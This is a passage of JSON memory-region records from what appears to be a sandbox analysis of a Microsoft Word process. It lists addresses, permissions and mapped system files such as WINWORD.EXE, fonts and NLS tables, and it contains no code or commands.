2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_145", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3219455, "entry_point": 0, "filename": null, "id": "region_146", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3280895, "entry_point": 0, "filename": null, "id": "region_147", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3346431, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3416063, "entry_point": 0, "filename": null, "id": "region_149", "name": "pagefile_0x0000000000340000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3407872, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3481599, "entry_point": 0, "filename": null, "id": "region_150", "name": "pagefile_0x0000000000350000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3473408, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3551231, "entry_point": 0, "filename": null, "id": "region_151", "name": "pagefile_0x0000000000360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3538944, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_152", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3682303, "entry_point": 0, "filename": null, "id": "region_153", "name": "pagefile_0x0000000000380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3670016, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_154", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4620287, "entry_point": 0, "filename": null, "id": "region_155", "name": "pagefile_0x00000000003a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3801088, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 5705727, "entry_point": 0, "filename": null, "id": "region_156", "name": "pagefile_0x0000000000470000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4653056, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 18350079, "entry_point": 0, "filename": null, "id": "region_157", "name": "pagefile_0x0000000000580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5767168, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 18350080, "type": "region", "version": 1 }, "end_va": 18362367, "entry_point": 0, "filename": null, "id": "region_158", "name": "pagefile_0x0000000001180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18350080, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 18415616, "type": "region", "version": 1 }, "end_va": 18427903, "entry_point": 0, "filename": null, "id": "region_159", "name": "pagefile_0x0000000001190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18415616, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 18481152, "type": "region", "version": 1 }, "end_va": 18489343, "entry_point": 0, "filename": null, "id": "region_160", "name": "pagefile_0x00000000011a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18481152, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 18546688, "type": "region", "version": 1 }, "end_va": 18677759, "entry_point": 0, "filename": null, "id": "region_161", "name": "private_0x00000000011b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18546688, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 18677760, "type": "region", "version": 1 }, "end_va": 18685951, "entry_point": 0, "filename": null, "id": "region_162", "name": "pagefile_0x00000000011d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18677760, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 18743296, "type": "region", "version": 1 }, "end_va": 18751487, "entry_point": 0, "filename": null, "id": "region_163", "name": "pagefile_0x00000000011e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18743296, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 147456, "start_va": 18808832, "type": "region", "version": 1 }, "end_va": 18956287, "entry_point": 0, "filename": null, "id": "region_164", "name": "private_0x00000000011f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18808832, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19005440, "type": "region", "version": 1 }, "end_va": 19009535, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x0000000001220000", "norm_filename": null, "region_type": "private_memory", "start_va": 19005440, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 19070976, "type": "region", "version": 1 }, "end_va": 19107839, "entry_point": 0, "filename": null, "id": "region_166", "name": "private_0x0000000001230000", "norm_filename": null, "region_type": "private_memory", "start_va": 19070976, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 19136512, "type": "region", "version": 1 }, "end_va": 19173375, "entry_point": 0, "filename": null, "id": "region_167", "name": "private_0x0000000001240000", "norm_filename": null, "region_type": "private_memory", "start_va": 19136512, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19267584, "type": "region", "version": 1 }, "end_va": 19271679, "entry_point": 0, "filename": null, "id": "region_168", "name": "private_0x0000000001260000", "norm_filename": null, "region_type": "private_memory", "start_va": 19267584, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 19333120, "type": "region", "version": 1 }, "end_va": 19398655, "entry_point": 0, "filename": null, "id": "region_169", "name": "private_0x0000000001270000", "norm_filename": null, "region_type": "private_memory", "start_va": 19333120, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 19398656, "type": "region", "version": 1 }, "end_va": 19415039, "entry_point": 0, "filename": null, "id": "region_170", "name": "pagefile_0x0000000001280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19398656, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 19464192, "type": "region", "version": 1 }, "end_va": 19468287, "entry_point": 0, "filename": null, "id": "region_171", "name": "pagefile_0x0000000001290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19464192, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 19529728, "type": "region", "version": 1 }, "end_va": 19533823, "entry_point": 0, "filename": null, "id": "region_172", "name": "pagefile_0x00000000012a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19529728, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19595264, "type": "region", "version": 1 }, "end_va": 19599359, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x00000000012b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19595264, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19660800, "type": "region", "version": 1 }, "end_va": 19664895, "entry_point": 0, "filename": null, "id": "region_174", "name": "private_0x00000000012c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19660800, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 19726336, "type": "region", "version": 1 }, "end_va": 19734527, "entry_point": 0, "filename": null, "id": "region_175", "name": "pagefile_0x00000000012d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19726336, "timestamp": "00:00:17.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1937408, "start_va": 19791872, "type": "region", "version": 1 }, "end_va": 21729279, "entry_point": 19791872, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "id": "region_176", "name": "winword.exe", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "region_type": "memory_mapped_file", "start_va": 19791872, "timestamp": "00:00:17.575", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 21757952, "type": "region", "version": 1 }, "end_va": 24702975, "entry_point": 21757952, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_177", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 21757952, "timestamp": "00:00:17.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 24707072, "type": "region", "version": 1 }, "end_va": 28848127, "entry_point": 0, "filename": null, "id": "region_178", "name": "pagefile_0x0000000001790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 24707072, "timestamp": "00:00:17.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 28901376, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 0, "filename": null, "id": "region_179", "name": "private_0x0000000001b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 28901376, "timestamp": "00:00:17.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 29949952, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 29949952, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_180", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 29949952, "timestamp": "00:00:17.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 30740479, "entry_point": 30736384, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_181", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 30736384, "timestamp": "00:00:17.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_182", "name": "private_0x0000000001d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 30801920, "timestamp": "00:00:17.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31977471, "entry_point": 0, "filename": null, "id": "region_183", "name": "pagefile_0x0000000001da0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31064064, "timestamp": "00:00:17.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 33030143, "entry_point": 0, "filename": null, "id": "region_184", "name": "private_0x0000000001e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 31981568, "timestamp": "00:00:17.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 131072, "start_va": 33030144, "type": "region", "version": 1 }, "end_va": 33161215, "entry_point": 33030144, "filename": "\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", "id": "region_185", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "region_type": "memory_mapped_file", "start_va": 33030144, "timestamp": "00:00:17.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 33161216, "type": "region", "version": 1 }, "end_va": 34209791, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000001fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33161216, "timestamp": "00:00:17.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 147456, "start_va": 34209792, "type": "region", "version": 1 }, "end_va": 34357247, "entry_point": 0, "filename": null, "id": "region_187", "name": "private_0x00000000020a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34209792, "timestamp": "00:00:17.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34672639, "entry_point": 0, "filename": null, "id": "region_188", "name": "pagefile_0x0000000002110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34668544, "timestamp": "00:00:17.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 34734080, "type": "region", "version": 1 }, "end_va": 34742271, "entry_point": 0, "filename": null, "id": "region_189", "name": "pagefile_0x0000000002120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34734080, "timestamp": "00:00:17.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 34799616, "type": "region", "version": 1 }, "end_va": 34869247, "entry_point": 34799616, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_190", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 34799616, "timestamp": "00:00:17.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 34930688, "type": "region", "version": 1 }, "end_va": 34996223, "entry_point": 0, "filename": null, "id": "region_191", "name": "private_0x0000000002150000", "norm_filename": null, "region_type": "private_memory", "start_va": 34930688, "timestamp": "00:00:17.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 24576, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 35020799, "entry_point": 34996224, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll", "id": "region_192", "name": "onbttnwd.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll", "region_type": "memory_mapped_file", "start_va": 34996224, "timestamp": "00:00:17.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 36110335, "entry_point": 0, "filename": null, "id": "region_193", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:00:17.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 36241407, "entry_point": 0, "filename": null, "id": "region_194", "name": "private_0x0000000002270000", "norm_filename": null, "region_type": "private_memory", "start_va": 36110336, "timestamp": "00:00:17.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 126976, "start_va": 36241408, "type": "region", "version": 1 }, "end_va": 36368383, "entry_point": 0, "filename": null, "id": "region_195", "name": "private_0x0000000002290000", "norm_filename": null, "region_type": "private_memory", "start_va": 36241408, "timestamp": "00:00:17.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 499712, "start_va": 36372480, "type": "region", "version": 1 }, "end_va": 36872191, "entry_point": 36372480, "filename": "\\Windows\\Fonts\\segoeuib.ttf", "id": "region_196", "name": "segoeuib.ttf", "norm_filename": "c:\\windows\\fonts\\segoeuib.ttf", "region_type": "memory_mapped_file", "start_va": 36372480, "timestamp": "00:00:17.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37552127, "entry_point": 0, "filename": null, "id": "region_197", "name": "private_0x00000000023b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37421056, "timestamp": "00:00:17.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 37552128, "type": "region", "version": 1 }, "end_va": 38600703, "entry_point": 0, "filename": null, "id": "region_198", "name": "private_0x00000000023d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37552128, "timestamp": "00:00:17.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 39649279, "entry_point": 0, "filename": null, "id": "region_199", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:00:17.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 39649280, "type": "region", "version": 1 }, "end_va": 39665663, "entry_point": 39649280, "filename": "\\Windows\\System32\\stdole2.tlb", "id": "region_200", "name": "stdole2.tlb", "norm_filename": "c:\\windows\\system32\\stdole2.tlb", "region_type": "memory_mapped_file", "start_va": 39649280, "timestamp": "00:00:17.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39845888, "type": "region", "version": 1 }, "end_va": 40108031, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x0000000002600000", "norm_filename": null, "region_type": "private_memory", "start_va": 39845888, "timestamp": "00:00:17.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40108032, "type": "region", "version": 1 }, "end_va": 40370175, "entry_point": 0, "filename": null, "id": "region_202", "name": "private_0x0000000002640000", "norm_filename": null, "region_type": "private_memory", "start_va": 40108032, "timestamp": "00:00:17.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 40370176, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_203", "name": "private_0x0000000002680000", "norm_filename": null, "region_type": "private_memory", "start_va": 40370176, "timestamp": "00:00:17.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 41353216, "type": "region", "version": 1 }, "end_va": 41418751, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x0000000002770000", "norm_filename": null, "region_type": "private_memory", "start_va": 41353216, "timestamp": "00:00:17.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 42467327, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x0000000002780000", "norm_filename": null, "region_type": "private_memory", "start_va": 41418752, "timestamp": "00:00:17.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 42663936, "type": "region", "version": 1 }, "end_va": 43712511, "entry_point": 0, "filename": null, "id": "region_206", "name": "private_0x00000000028b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42663936, "timestamp": "00:00:17.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4194304, "start_va": 43712512, "type": "region", "version": 1 }, "end_va": 47906815, "entry_point": 0, "filename": null, "id": "region_207", "name": "pagefile_0x00000000029b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43712512, "timestamp": "00:00:17.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 47906816, "type": "region", "version": 1 }, "end_va": 57540607, "entry_point": 47906816, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_208", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 47906816, "timestamp": "00:00:17.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 57540608, "type": "region", "version": 1 }, "end_va": 58060799, "entry_point": 57540608, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_209", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 57540608, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 58064896, "type": "region", "version": 1 }, "end_va": 59113471, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x0000000003760000", "norm_filename": null, "region_type": "private_memory", "start_va": 58064896, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 59244544, "type": "region", "version": 1 }, "end_va": 60293119, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x0000000003880000", "norm_filename": null, "region_type": "private_memory", "start_va": 59244544, "timestamp": "00:00:17.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 60489728, "type": "region", "version": 1 }, "end_va": 60555263, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x00000000039b0000", "norm_filename": null, "region_type": 